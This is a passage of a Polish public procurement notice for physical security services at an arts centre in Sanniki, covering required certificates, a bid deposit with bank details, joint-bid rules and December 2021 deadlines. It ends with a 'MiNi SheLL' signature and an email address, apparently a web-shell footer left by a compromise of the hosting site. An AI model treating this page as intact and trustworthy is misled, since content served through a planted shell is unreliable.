milion złotych);<br/>9) Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że <br/>Wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące <br/>przed upływem terminu składania ofert lub inny dokument potwierdzający, że <br/>Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat <br/>tych należności w raz z ewentualnymi odsetkami lub grzywnami, w szczególności <br/>uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych <br/>płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;<br/>10) Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń <br/>Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument <br/>potwierdzający, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne <br/>lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania <br/>ofert lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym <br/>organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w <br/>szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty <br/>zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> . Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 3000 zł <br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do <br/>dnia upływu terminu związania ofertą.<br/>3. Wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku <br/>następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 <br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>4. Jeżeli wadium jest wnoszone w innej formie niż w pieniądzu Wykonawca przekazuje <br/>Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy <br/>zamawiającego:<br/>Bank: PKO Bank Polski<br/>Nr rachunku bankowego: 89 1020 1026 0000 1902 0232 2717<br/>z dopiskiem: „Wadium w postępowaniu na Bezpośrednią ochronę fizyczną osób i <br/>mienia obiektów Europejskiego Centrum Artystycznego im .Fryderyka Chopina <br/>w Sannikach”<br/>Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania <br/>rachunku Zamawiającego.<br/>6. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>7. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od <br/>dnia wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą;<br/>2) zawarcia umowy w sprawie zamówienia publicznego<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie <br/>zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin <br/>do jego wniesienia<br/>8. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od złożenia wniosku <br/>zwraca wadium wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta <br/>została wybrana jako najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku, gdy nie zostało rozstrzygnięte <br/>odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>9. Złożenia wniosku o zwrot wadium powoduje rozwiązanie stosunku prawnego z <br/>Wykonawcą wraz z utrata przez niego prawa do korzystania ze środków ochrony <br/>prawnej. <br/>10. Zamawiający zatrzyma wadium wraz z odsetkami, a w przypadku wadium wniesionego <br/>w formie niepieniężnej, wystąpi odpowiednio do gwaranta lub poręczyciela z żądaniem <br/>zapłaty wadium, jeżeli:<br/>1) Wykonawca w odpowiedzi na wezwanie, z przyczyn lezących po jego stronie, nie <br/>złożył podmiotowych środków dowodowych lub przedmiotowych środków <br/>dowodowych potwierdzających spełnianie warunków udziału w postępowaniu i brak <br/>podstaw wykluczenia, innych dokumentów lub oświadczeń lub nie wyraził zgody na <br/>poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowało brak <br/>możliwości wybrania oferty jako najkorzystniejszej;<br/>2) Wykonawca, którego oferta została wybrana:<br/>a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach <br/>określonych w ofercie,<br/>b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z <br/>przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, ( Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania wzór oświadczenia stanowi załącznik nr.2 do SWZ, Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu - wzór oświadczenia stanowi Załącznik nr.2 do SWZ) składa każdy z Wykonawców.<br/>2.Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>3.Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych wspólnie przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Określone szczegółowo zasady zostały wpisane w projekcie umowy stanowiącym załącznik nr.3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-23 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenie oferty został opisanyw &#34;instrukcja użytkownik&#34; dostępnej na mini Portalu pod adresem HTTP://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-23 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com